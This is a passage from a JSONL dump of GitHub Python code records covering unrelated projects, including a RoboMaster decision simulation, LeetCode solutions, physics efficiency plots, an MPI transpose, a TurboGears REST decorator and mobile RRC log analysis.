Get Value from Black Board\r\n ==================================================\r\n '''\r\n initialize()\r\n #stance = 'passive'\r\n stance = 'aggressive'\r\n \r\n r1_pos = [0.500, 4.500]\r\n r3_pos = [7.5, 4]\r\n #r4_pos = [7.0, .5]\r\n \r\n buff_time = 0\r\n ammo_left = False\r\n \r\n while now_time(startTime) < 20: \r\n f1 = now_time(startTime)\r\n \r\n robot1.init()\r\n robot1.bonus_zone(buff_time, 2, False, 200)\r\n robot1.enemy_zone(stance, r3_pos, 90, 1.5, 50) \r\n robot1.enemy_zone(stance, r3_pos, 90, 1.5, 50) \r\n robot1.reload_zone(stance, now_time(startTime), ammo_left, 10, 100) \r\n robot1.move_cost(stance, r1_pos, -2)\r\n #robot1.enemy_overlap(r3_pos, r4_pos, 25) \r\n robot1.first_occupy(r1_pos)\r\n robot1.wall_limit()\r\n \r\n if int(now_time(startTime))%30 == 0 and now_time(startTime) > 2:\r\n ammo_left = True\r\n \r\n '''\r\n ==================================================\r\n test variable change\r\n ==================================================\r\n '''\r\n flags = np.zeros([10])\r\n if now_time(startTime) >= 5 and now_time(startTime) < 35:\r\n buff_time = 35-now_time(startTime)\r\n if now_time(startTime) >= 5:\r\n buff_time = 65-now_time(startTime)\r\n \r\n r1_score = robot1.raw().getValue(r1_pos)\r\n r1_goal = robot1.raw().getPoint() \r\n pt = now_time(startTime) - f1\r\n print('my_pos : ', r1_score, r1_pos, 'Max :' , r1_goal)\r\n print('Process Time : ', pt , 'FPS:', int(10/pt)/10 ) \r\n \r\n \r\n \r\n ''' enemy'''\r\n robot3.init()\r\n robot3.bonus_zone(buff_time, 2, False, 200)\r\n robot3.enemy_zone(stance, r1_pos, 100, 1.5, 50) \r\n robot3.reload_zone(stance, now_time(startTime), ammo_left, 10, 100) \r\n robot3.move_cost(stance, r3_pos, -2)\r\n robot3.wall_limit()\r\n robot1.first_occupy(r3_pos)\r\n robot1.enemy_occupy(r3_pos)\r\n \r\n r3_score = robot3.raw().getValue(r3_pos)\r\n r3_goal = robot3.raw().getPoint() \r\n \r\n \r\n ''' teleport move'''\r\n if r1_score+50+10 < r1_goal[0] :\r\n r1_pos = r1_goal[1] \r\n \r\n if r3_score+50+10 < r3_goal[0] :\r\n r3_pos = r3_goal[1] \r\n \r\n robot1.plot()\r\n plt.pause(1)\r\n \r\n ","repo_name":"Jwill1994/RobomasterAIChallenge","sub_path":"Decision/decision_map/window_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20301057839","text":"class Solution:\n def licenseKeyFormatting(self, s: str, k: int) -> str:\n if (len(s)-s.count(\"-\"))%k!=0:\n first=(len(s)-s.count(\"-\"))%k\n firstDone=False\n else:\n firstDone=True\n appendList=[]\n count=0\n intermittentString=\"\"\n for i,st in enumerate(s):\n if st!=\"-\":\n if not firstDone:\n intermittentString+=st\n count+=1\n if count==first:\n firstDone=True\n count=0\n appendList.append(intermittentString.upper())\n intermittentString=\"\"\n else:\n intermittentString+=st\n count+=1\n if count==k:\n count=0\n appendList.append(intermittentString.upper())\n intermittentString=\"\"\n return \"-\".join(appendList)\n \nif __name__==\"__main__\":\n s = \"2-5g-3-J\"\n k = 2\n print(Solution().licenseKeyFormatting(s=s,k=k))","repo_name":"ritishadhikari/leetCode","sub_path":"482_License_Key_Formatting.py","file_name":"482_License_Key_Formatting.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30337665664","text":"import serverUser, modules\n\n\ndef main():\n # Opens the file\n with open(\"input.txt\", \"r\") as f:\n # Reads the file and stores into their respective variables\n ttask = int(f.readline())\n # Checks if it is a valid input\n if ttask < 1 or ttask > 10:\n raise ValueError\n umax = int(f.readline())\n # Checks if it is a valid input again\n if umax < 1 or umax > 10:\n raise ValueError\n # Declares necessary variables for use\n servers, users = [], []\n server_counter = 1\n expenses = 0\n with open(\"output.txt\", \"w\") as output:\n # This while represents every tick\n while True:\n # Checks and deletes every user which has done their task\n modules.clean_users(users)\n\n # Shutdown any server which has 0 users\n modules.shutdown(servers)\n\n number_of_users = f.readline()\n\n # If it contains users to process\n if number_of_users != \"\":\n # Processes the users\n for i in range(int(number_of_users)):\n is_inserted = False\n # Insert a user into a server\n for server in servers:\n if server.is_available():\n server.add_user()\n users.append(serverUser.User(server, ttask))\n is_inserted = True\n break\n\n if not is_inserted:\n servers.append(serverUser.Server(server_counter, umax))\n server_counter += 1\n users.append(serverUser.User(servers[-1], ttask))\n # Write the expenses and exits the program\n # If there are no more servers running\n if not servers:\n output.write('0' + '\\n' + str(expenses))\n break\n # Writes to the output the servers that are active\n output.write(modules.server_string(servers))\n # Calculate the expenses\n expenses += len(servers)\n\nmain()\n","repo_name":"prophylacticoder/topaz_exercise","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43627236825","text":"from typing import Dict, Union\n\nimport tempfile\nfrom functools import wraps\nfrom os import path, makedirs\n\n\ndef create_file_struct(base_dir: str, struct: Dict[str, Union[int, dict]]):\n for k, v in struct.items():\n if isinstance(v, int):\n file_name = path.join(base_dir, k)\n\n with open(file_name, \"wb\") as out_file:\n out_file.seek(v - 1)\n out_file.write(b\"\\0\")\n\n elif isinstance(v, dict):\n next_dir_path = path.join(base_dir, k)\n makedirs(next_dir_path)\n\n create_file_struct(next_dir_path, v)\n\n\ndef with_file_structure(struct: Dict[str, Union[int, dict]]):\n def wrapper(func):\n @wraps(func)\n def wrapped(*args, **kwargs):\n with tempfile.TemporaryDirectory() as tmp_dir_name:\n create_file_struct(tmp_dir_name, struct)\n\n func(*args, wd=tmp_dir_name, **kwargs)\n\n return wrapped\n\n return wrapper\n","repo_name":"kc41/fspy","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71869202771","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nExponential = __import__('exponential').Exponential\n\n\nnp.random.seed(0)\ndata = np.random.exponential(0.5, 9999).tolist()\ne = Exponential(data)\nprint('f(1):', e.pdf(1))\nprint('F(1):', e.cdf(1))\n\nx = np.arange(0, 15, 0.001)\ny = [e.pdf(x) for x in x]\nz = [e.cdf(x) for x in x]\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\n\nplt.title('Exponential Distribution')\nax1.hist(data, 60, density=True)\npdf = ax1.plot(x, y, color='red', label='pdf')\ncdf = ax2.plot(x, z, color='green', label='cdf')\nplt.xticks(np.arange(0, 3.5, step=0.5))\nplt.xlim(0, 3)\nplt.ylim(0, 1)\n\nax1.set_xlabel('x')\nax1.set_ylabel('pdf')\nax2.set_ylabel('cdf')\nplt.show()\n","repo_name":"alejogonza/holbertonschool-machine_learning","sub_path":"math/0x03-probability/exponentialplot.py","file_name":"exponentialplot.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26688904006","text":"import collections\n\n\ndef solution(k, tangerine):\n count = collections.Counter(tangerine)\n count = dict(count.most_common())\n value = 0\n answer = 0\n for i in count.keys():\n value += count[i]\n answer += 1\n if value >= k:\n break\n return answer\n","repo_name":"seonghun-dev/Algorithm","sub_path":"programmers/level2/programmers138476.py","file_name":"programmers138476.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"42602440970","text":"#coding=utf-8\n\"\"\"\n@athor:weifeng.guo \n@data:2018/11/12 15:12\n@filename:Popular_Words\n\"\"\"\ndef popular_words(strings, list):\n dict = {}\n strings = strings.lower()\n string_list = strings.replace(\"\\n\", \" \").split(\" \")\n for char in list:\n dict[char] = string_list.count(char)\n return dict\n\npopular_words('''When I was One\nI had just begun\nWhen I was Two\nI was nearly new\n''', ['i', 'was', 'three', 'near'])","repo_name":"guoweifeng216/pythonlearn","sub_path":"checkio/Popular_Words.py","file_name":"Popular_Words.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33521073532","text":"import pytest\n\n\n@pytest.fixture\ndef mock_contractor_merch_payments(mockserver):\n @mockserver.json_handler(\n 'contractor-merch-payments/'\n 'internal/v1/contractor-merch-payments/payment/status',\n )\n async def _payment_status_get(request):\n if context.payment_status_get.status != 200:\n return mockserver.make_response(\n status=context.payment_status_get.status,\n json={\n 'code': 'payment_not_found',\n 'message': 'payment_not_found',\n },\n )\n\n payment = {\n 'contractor': {\n 'park_id': 'park-id-0',\n 'contractor_id': 'contractor-id-0',\n },\n 'status': 'pending_merchant_approve',\n 'created_at': context.payment_status_get.created_at,\n 'updated_at': context.payment_status_get.updated_at,\n }\n\n if context.payment_status_get.body is not None:\n payment.update(context.payment_status_get.body)\n\n return {'payment': payment}\n\n class PaymentStatusGetContext:\n def __init__(self):\n self.handler = _payment_status_get\n\n self.body = None\n self.status = 200\n self.created_at = '2021-11-12T12:00:00+00:00'\n self.updated_at = '2021-11-12T12:00:00+00:00'\n\n @mockserver.json_handler(\n 'contractor-merch-payments/'\n 'internal/contractor-merch-payments/v1/payment/price',\n )\n async def _payment_price_put(request):\n return context.payment_price_put.body\n\n class PaymentPricePutContext:\n def __init__(self):\n self.handler = _payment_price_put\n\n self.body = {\n 'contractor': {\n 'park_id': 'park-id-0',\n 'contractor_id': 'contractor-id-0',\n },\n 'created_at': '2021-11-12T12:00:00+00:00',\n }\n\n class Context:\n def __init__(self):\n self.payment_status_get = PaymentStatusGetContext()\n self.payment_price_put = PaymentPricePutContext()\n\n context = Context()\n\n return context\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_contractor_merch_payments_bot/mocks/contractor_merch_payments.py","file_name":"contractor_merch_payments.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16427102761","text":"# Создание класса \"Телефонная книга\" с атрибутами \"имя\", \"номер телефона\".\n# Реализовать методы для добавления и удаления контакта, изменения данных контакта, вывода информации о всех контактах, а также поиска контакта по имени.\n\n# импортируем класс\nclass Phonebook:\n all_contacts = []\n\n def __init__(self, name, phone_number):\n self.name = name\n self.phone_number = phone_number\n Phonebook.all_contacts.append(self)\n @classmethod\n def add_contact(cls,contact):\n cls.all_contacts.append(contact)\n\n\n def change_phone(self,phone):\n self.phone_number = phone\n\n @classmethod\n def print_contacts(self):\n for contact in Phonebook.all_contacts:\n print(f'имя: {contact.name}, номер телефона: {contact.phone_number}')\n\n\n @classmethod\n def search_contact(cls, name):\n for contact in Phonebook.all_contacts:\n if contact.name == name:\n print(f'Имя : {contact.name}, номер : {contact.phone_number}' )\n\n\n\n\n\n\n# создаем объекты контактов\ncontact1 = Phonebook(\"Иван Иванов\", \"+7 (111) 111-11-11\")\ncontact2 = Phonebook(\"Петр Петров\", \"+7 (222) 222-22-22\")\n\n# добавляем контакт\ncontact3 = Phonebook(\"Сергей Сергеев\", \"+7 (333) 333-33-33\")\nPhonebook.add_contact(contact3)\n\n# изменяем данные контакта\ncontact1.change_phone(\"+7 (444) 444-44-44\")\n\n# выводим информацию о всех контактах\nPhonebook.print_contacts()\n\n# ищем контакт по имени\nPhonebook.search_contact(\"Петр Петров\")","repo_name":"zzzolliom/phytonLevelUp2","sub_path":"Home_tasks_3/3_PhoneBook.py","file_name":"3_PhoneBook.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22532237920","text":"from __future__ import print_function, unicode_literals, absolute_import, division\nimport numpy as np\nimport numpy.testing as npt\nimport scipy.ndimage.filters as spf\nfrom itertools import combinations_with_replacement, combinations\nfrom gputools.convolve import gaussian_filter\nfrom gputools.convolve.generic_separable_filters import _gauss_filter\n\n\ndef _test_single(dshape, sigma, dtype = np.float32, strides=(1,1),skip_assert = False):\n x = np.random.randint(0, 240, dshape).astype(dtype)\n\n ss_stride = tuple(slice(0,None,s) for s in strides)\n \n out1 = gaussian_filter(x, sigma, strides=strides)\n out2 = spf.gaussian_filter(x, sigma, mode= \"constant\", cval=0)[ss_stride]\n\n print((\"shape: %s sigma: %s strides %s type: %s diff: %.2f\" % (dshape, sigma, strides, dtype,np.amax(np.abs(1.*out1 - out2)))))\n if not skip_assert:\n npt.assert_almost_equal(out1,out2, decimal = 0)\n return out1, out2\n\n\ndef test_all():\n stridess = {2:((1,1),(2,2),(4,3)), 3:((1,1,1),(2,2,2),(4,1,1),(3,2,5))}\n for ndim in (2,3):\n for dshape in combinations([19,31,43],ndim):\n for sigma in combinations_with_replacement([3,4,5],ndim):\n for dtype in (np.float32,np.uint16, np.int32):\n for strides in stridess[ndim]:\n _test_single(dshape,sigma, dtype = dtype, strides=strides)\n\n \nif __name__ == '__main__':\n # x,y = _test_single((10,10,10),(1,1,2), strides=(1,1,1), dtype = np.uint16, skip_assert=True)\n np.random.seed(31)\n x,y = _test_single((19, 31, 43),(3,3,0), strides=(1,1,1), dtype = np.uint16, skip_assert=True)\n\n # ind = np.unravel_index(np.argmax(np.abs(1.*x-y)), x.shape)\n # print(ind)\n\n # print(x[tuple(ind)])\n # print(y[tuple(ind)])\n \n\n # from gputools import get_device\n # get_device().queue.finish()\n","repo_name":"maweigert/gputools","sub_path":"tests/convolve/test_gaussian.py","file_name":"test_gaussian.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"66"} +{"seq_id":"4780968273","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass RomanNumeral:\n symbol: str\n value: int\n\n\nroman_numerals = [\n RomanNumeral(\"M\", 1000),\n RomanNumeral(\"CM\", 900),\n RomanNumeral(\"D\", 500),\n RomanNumeral(\"CD\", 400),\n RomanNumeral(\"C\", 100),\n RomanNumeral(\"XC\", 90),\n RomanNumeral(\"L\", 50),\n RomanNumeral(\"XL\", 40),\n RomanNumeral(\"X\", 10),\n RomanNumeral(\"IX\", 9),\n RomanNumeral(\"V\", 5),\n RomanNumeral(\"IV\", 4),\n RomanNumeral(\"I\", 1),\n]\n\n\ndef to_roman(arabic: int) -> str:\n for numeral in roman_numerals:\n if numeral.value <= arabic:\n return numeral.symbol + to_roman(arabic - numeral.value)\n return \"\"\n\n\ndef to_arabic(roman: str) -> int:\n for numeral in roman_numerals:\n if roman.startswith(numeral.symbol):\n return numeral.value + to_arabic(roman[len(numeral.symbol) :])\n return 0\n\n\n# Seventh pass. Minimal naming changes only; clean progression.\n","repo_name":"jorgearanda/katas","sub_path":"roman/roman.py","file_name":"roman.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36018816137","text":"# import scenarios from another folder\r\nimport sys\r\nimport random\r\n# add the scenario and output folders to the system path\r\nsys.path.insert(0,'/scenarios')\r\n\r\n# import functions from the folders\r\n# -- scenario one -- \r\nfrom scenarios.story_one import scenario_one # import scenario_one and the class\r\n# -- scenario two -- \r\nfrom scenarios.scenario_two import scenario_two # import scenario class from the folder \r\n# -- scenario three -- \r\nfrom scenarios.scenario_three import scenario_three # import scenario class from the folder\r\n# -- scenario four --\r\n\r\n# adapt the function into variables for this file\r\n\r\nscenario_one = scenario_one\r\nscenario_two = scenario_two\r\nscenario_three = scenario_three\r\n\r\n# print the variables and length of the variables\r\nprint(scenario_one)\r\nprint(scenario_two)\r\nprint(scenario_three)\r\n\r\n# randomize the scenarios and print them into a file\r\nstory = random.choice([scenario_one, scenario_two])\r\n# print the story\r\nprint(story)\r\n\r\n# saves the reference of the standard output\r\noriginal_stdout = sys.stdout\r\n\r\nwith open('output.txt', 'w') as f:\r\n sys.stdout = f # Change the standard output to the file we created.\r\n print(story) # Prints the story to a file.\r\n print('This message will be written to a file.')\r\n sys.stdout = original_stdout # Reset the standard output to its original value\r\n print('This message will be written to the console.')\r\n\r\n","repo_name":"raphtolentino/Personal-Projects","sub_path":"Twitter-bot/program_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72453714408","text":"from ROOT import *\nfrom array import array\nimport sys\nfrom set_style import *\n\ngROOT.SetBatch(1)\n\nf = TFile(sys.argv[1], \"OPEN\")\nt = f.Get(\"pion_tree\")\n\n\nbinning = \"(\" + str(sys.argv[2]) + \",0,\" + sys.argv[3] + \")\"\n\nt.Draw(\"pion_P>>d\" + binning, \"\")\nt.Draw(\"pion_P>>n\" + binning, \"!missed_pion\")\n\nd = gDirectory.Get(\"d\")\nn = gDirectory.Get(\"n\")\n\nd.Sumw2()\nn.Sumw2()\n\nd.Draw()\n\nc0 = TCanvas(\"c0\",\"c0\", 500,400)\nc0.SetTicks(1)\ngStyle.SetOptStat(0)\nset_style( d, \"True #pi Momentum (GeV/c)\", \"\")\nd.Draw()\nc0.SaveAs(\"pion_p.pdf\")\n\n\neff = TEfficiency(n,d)\noutfile = TFile(\"pion_eff.root\", \"RECREATE\")\neff.Write(\"eff\")\n\n\nc1 = TCanvas( \"c1\", \"c1\", 500, 400 )\nc1.SetTicks(1)\neff.SetMarkerStyle(20)\neff.Draw()\nset_style( eff, \"True #pi Momentum (GeV/c)\", \"Efficiency\", form=0)\neff.Draw(\"AP\")\n\n\nc1.SaveAs(sys.argv[4])\n\n\nt.Draw(\"pion_P:pion_len>>d2(15,0,300,10,0,1.4)\", \"\")\nt.Draw(\"pion_P:pion_len>>n2(15,0,300,10,0,1.4)\", \"!missed_pion\")\n\nd2 = gDirectory.Get(\"d2\")\nn2 = gDirectory.Get(\"n2\") \n\neff2 = TEfficiency(n2,d2)\n\n\nset_style( d2, \"True #pi Length (cm)\", \"True #pi Momentum (GeV/c)\")\ngStyle.SetPalette(kBird)\nd2.Draw(\"colz\")\nc1.SaveAs(\"pion_p_len.pdf\")\n\nt.Draw(\"pion_len>>d3(45,0,300)\", \"\")\nt.Draw(\"pion_len>>n3(45,0,300)\", \"!missed_pion\")\n\nd3 = gDirectory.Get(\"d3\")\nn3 = gDirectory.Get(\"n3\") \n\neff3 = TEfficiency(n3,d3)\n\ncLen = TCanvas(\"cLen\", \"\", 500, 400)\ncLen.SetTicks()\neff3.SetMarkerStyle(20)\neff3.Draw()\nset_style( eff3, \"True #pi Length (cm)\", \"Efficiency\", form=0)\neff3.Draw(\"AP\")\n\n\n\n\ncHits = TCanvas(\"cHits\", \"\", 500, 400)\ncHits.SetTicks()\nt.Draw(\"pion_hits>>d4(60,0,400)\", \"\")\nt.Draw(\"pion_hits>>n4(60,0,400)\", \"!missed_pion\")\n\nd4 = gDirectory.Get(\"d4\")\nn4 = gDirectory.Get(\"n4\") \n\neff4 = TEfficiency(n4,d4)\n\neff4.SetMarkerStyle(20)\neff4.Draw()\nset_style( eff4, \"True #pi Hits\", \"Efficiency\", form=0)\neff4.Draw(\"AP\")\n\n\n\ncEndZ = TCanvas(\"cEndZ\", \"\", 500, 400)\ncEndZ.SetTicks()\nt.Draw(\"endZ>>d5(100,0,300)\", \"\")\nt.Draw(\"endZ>>n5(100,0,300)\", \"!missed_pion\")\n\nd5 = gDirectory.Get(\"d5\")\nn5 = gDirectory.Get(\"n5\") \n\neff5 = TEfficiency(n5,d5)\n\neff5.SetMarkerStyle(20)\neff5.Draw()\nset_style( eff5, \"Reco Beam End Z (cm)\", \"Efficiency\", form=0)\neff5.Draw(\"AP\")\n\n\n\noutfile.cd()\neff2.Write(\"eff2D\")\neff3.Write(\"eff_len\")\neff4.Write(\"eff_hits\")\neff5.Write(\"eff_endZ\")\nd4.Write(\"hits\")\ncHits.Write(\"c_eff_hits\")\ncEndZ.Write(\"c_eff_endZ\")\ncLen.Write(\"c_eff_len\")\n\noutfile.Close()\n\n","repo_name":"calcuttj/PionStudies","sub_path":"new_draw_pion_eff.py","file_name":"new_draw_pion_eff.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20438298481","text":"import numpy as np\nfrom Derivative import errorFunc, printProp\nimport Student\nimport Plots\n\n\na1 = np.array([0.034,0.044,0.054,0.064,0.074], dtype=float)\na2 = np.array([0.027,0.037,0.047,0.057,0.067], dtype=float)\nomega1 = np.array([0.122,0.147,0.180,0.208,0.240], dtype=float)\nomega2 = np.array([0.098,0.137,0.162,0.189,0.221], dtype=float)\n\n\n\ndef show(a, o):\n x = a \n y = o\n da = 5 * 10 ** (-4)\n do = 10 ** (-3)\n err_x = np.array([da] * len(a), dtype=float)\n err_y = np.array([do] * len(o), dtype=float)\n betas = Plots.plotODR(x, y, err_x, err_y)\n Plots.plotPoints(x, y, err_x, err_y)\n # Plots.show(\"Orthogonal Distance Regression with errors\", \"distance: a, m\"\n # , r\"angular velocity: omega, $s^{-1}$\")\n\n return betas\n\n\nbeta1 = show(a1, omega1)\nbeta2 = show(a2, omega2)\n\n#beta = Student.combineErrors([beta1[0], beta2[0]], [beta1[2], beta2[2]], [len(a1), len(a2)])\n\n#print(beta)\n\nf = 40\nm = 204 * (10 ** (-3))\ndm = 1 * (10 ** (-3))\ng = 9.81\n\ndef moment(m, k):\n global g, f\n return m * g / (k * 2 * np.pi * f)\n\n\nerror_m1 = errorFunc(moment, [m, beta1[0]], [dm, beta1[2]])\nerror_m2 = errorFunc(moment, [m, beta2[0]], [dm, beta2[2]])\n\nm1 = moment(m, beta1[0])\nm2 = moment(m, beta2[0])\n\nprint([m1, m2], [error_m1, error_m2])\nprint(Student.combineErrors([m1, m2], [error_m1, error_m2], [1, 1]))","repo_name":"LoolzMe/University","sub_path":"Labs/FirstSemester/Lab5.py","file_name":"Lab5.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73938389608","text":"def is_safe(mat, visited, row, col):\n \"\"\"\n verify that the position is either a 0 or * and that it has not been visited yetl\n \"\"\"\n return (mat[row][col] == 0 or mat[row][col] == \"*\") and ((row, col)) not in visited\n\n\ndef is_valid(row, col):\n \"\"\"\n verify that the position is inbounds the grid\n \"\"\"\n return 0 <= row < rows and 0 <= col < cols\n\n\ndef find_shortest_path(matrix, start):\n \"\"\"\n return the location of the found vertex, number of vertexes visited, shortest path to the location\n \"\"\"\n count = 0\n q = [(start, [start])]\n # construct a set to keep track of visited cells\n visited = set()\n while q:\n vertex, path = q.pop(0)\n i, j = vertex[0], vertex[1]\n visited.add((i, j))\n count += 1\n\n if matrix[i][j] == \"*\":\n return (i, j), count, path\n\n if is_valid(i + 1, j) and is_safe(matrix, visited, i + 1, j):\n next_node = (i + 1, j)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i - 1, j) and is_safe(matrix, visited, i - 1, j):\n next_node = (i - 1, j)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i, j + 1) and is_safe(matrix, visited, i, j + 1):\n next_node = (i, j + 1)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i, j - 1) and is_safe(matrix, visited, i, j - 1):\n next_node = (i, j - 1)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n\nrows = cols = 4\nmat = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 1, 0, 0], [1, 0, \"*\", 1]]\nstart = (0, 0)\n\nprint(find_shortest_path(mat, start))\n","repo_name":"balassit/improved-potato","sub_path":"examples/bfs-grid.py","file_name":"bfs-grid.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42673050348","text":"\"\"\" mpiexec -n 4 python3 task_mpi.py\n\"\"\"\nfrom __future__ import print_function\nimport time\nimport numpy as np\nfrom mpi4py import MPI\nfrom task import worker\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nN = 4000 # Matrix size\nM = None # Original Matrix (created by root proc)\nt1 = None # Start time\njobs = None # Jobs for workers (splitted matrix) in to (almost) equal parts\n\nif rank == 0:\n t1 = time.time()\n M = np.random.randint(10, size=(N, N))\n jobs = np.array_split(M, size, axis=1)\n\njob = comm.scatter(jobs, root=0)\n\nprint(\"%d rank :: received job\" % rank)\nresult = worker(job)\nprint(\"%d rank :: send result\" % rank)\n\nresults = comm.gather(result, root=0)\n\nif rank == 0:\n T = np.stack(np.concatenate(results))\n assert np.allclose(T, M.transpose()), \"Transposed matrix incorrect\"\n print(time.time() - t1)\n","repo_name":"mantydze/lps","sub_path":"transpose/task_mpi.py","file_name":"task_mpi.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13639054525","text":"import inspect\n\nimport cherrypy\nfrom turbogears.controllers import expose, Controller\n\n\nimport logging\nlog = logging.getLogger('turbogears.rest')\n\n\ndef _default(self, *vpath, **kw):\n http_method = cherrypy.request.method\n method = getattr(self, http_method)\n\n # If there is a vpath, we tried to look up a sub-resource or other exposed\n # method and failed\n if vpath:\n raise cherrypy.HTTPError(404, 'Not found')\n elif not callable(method) or not getattr(method, 'exposed', False):\n raise cherrypy.HTTPError(405, '%s not allowed on %s' % (\n http_method, cherrypy.request.browser_url))\n\n return method(**kw)\n\n\ndef RESTContainer(resource_cls_or_name=None):\n \"\"\"Class decorator for implementing REST-style container controllers.\n\n For example, to create a list of candidate resources such that::\n\n /candidates/\n\n returns a candidate resource for the specified candidate, define the\n candidates controller as\n\n >>> @RESTContainer('CandidateResource')\n ... class CandidateRootController(Controller):\n ... pass\n\n >>> class CandidateResource(RESTResource):\n ... \"Represents a single candidate\"\n\n The resource class must have a constructor that takes a single integer ID\n as its first parameter and a reference to the parent container as the\n second parameter.\n\n RESTContainers also do method-based dispatch if the decorated controller\n class does *not* define default::\n\n >>> @RESTContainer(CandidateResource)\n ... class CandidateRootController(Controller):\n ... @expose()\n ... def GET(self):\n ... # handle request for /candidates\n\n For most resource containers, it is assumed that the resource class uses\n integer identifiers, and the int() function is used to determine that a\n resource is being requested: non-integer attribute requests are assumed to\n be requests for attributes on the container itself.\n\n If the resource class defines a valid_id static function, it is used in\n preference to the int function to determine if an attribute request should\n return an instance of the container's resource class. The valid_id function\n should take a single argument and return it if it is a valid identifier or\n raise ValueError if it is not.\n\n \"\"\"\n\n def decorator(controller_cls):\n def resolve_resource(obj):\n try:\n _cls = obj.resource_cls\n except AttributeError:\n try:\n module = inspect.getmodule(type(obj))\n _cls = obj.resource_cls = getattr(module,\n resource_cls_or_name)\n except (TypeError, AttributeError):\n _cls = obj.resource_cls = resource_cls_or_name\n\n return _cls\n\n def _cp_dispatch(self, vpath):\n log.debug('%s vpath: %s', type(self).__name__, vpath)\n\n try:\n resource_id = vpath[0]\n resource_cls = resolve_resource(self)\n id_validator = getattr(resource_cls, 'valid_id', str)\n return resource_cls(id_validator(resource_id), self)\n except ValueError as e:\n log.debug('Invalid resource id: %s (%s: %s)',\n resource_id,\n type(e).__name__,\n e)\n return vpath\n\n controller_cls._cp_dispatch = _cp_dispatch\n\n if not hasattr(controller_cls, 'default'):\n controller_cls.default = expose()(_default)\n\n return controller_cls\n\n return decorator\n\n\nclass RESTResource(Controller):\n \"\"\"Controller base class that provides HTTP method-based dispatch.\n\n Subclasses should define methods for each HTTP method they wish to\n implement (e.g. ``GET``).\n\n See ``README.rst`` and ``controllers.py`` in the example application for\n example usages.\n\n \"\"\"\n\n default = expose()(_default)\n","repo_name":"drocco007/TurboRest","sub_path":"turborest/turbogears/rest/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72906158248","text":"#!/usr/bin/python\n# Filename: rrc_config_analyzer.py\n\"\"\"\nrrc_config_analyzer.py\nAn KEI analyzer to reveal RRC config information\n\nAuthor: Zhehui Zhang\n\"\"\"\n\n__all__ = [\"RrcConfigAnalyzer\"]\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nfrom .kpi_analyzer import KpiAnalyzer\n\n\nclass RrcConfigAnalyzer(KpiAnalyzer):\n \"\"\"\n An KPI analyzer to monitor and manage RRC connection success rate\n \"\"\"\n\n def __init__(self):\n KpiAnalyzer.__init__(self)\n\n self.current_kpi = {'SR_CONFIG_IDX': 0.00}\n\n for kpi in self.current_kpi:\n self.register_kpi(\"Configuration\",kpi,self.__rrc_config_callback)\n\n # add callback function\n self.add_source_callback(self.__rrc_config_callback)\n\n def set_source(self,source):\n \"\"\"\n Set the trace source. Enable the LTE RRC messages.\n\n :param source: the trace source.\n :type source: trace collector\n \"\"\"\n KpiAnalyzer.set_source(self,source)\n #enable LTE RRC log\n source.enable_log(\"LTE_RRC_OTA_Packet\")\n\n def __rrc_config_callback(self, msg):\n # deal with RRC OTA\n if msg.type_id == \"LTE_RRC_OTA_Packet\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n if 'Msg' in log_item_dict:\n log_xml = ET.XML(log_item_dict['Msg'])\n for field in log_xml.iter('field'):\n if field.get('name') == 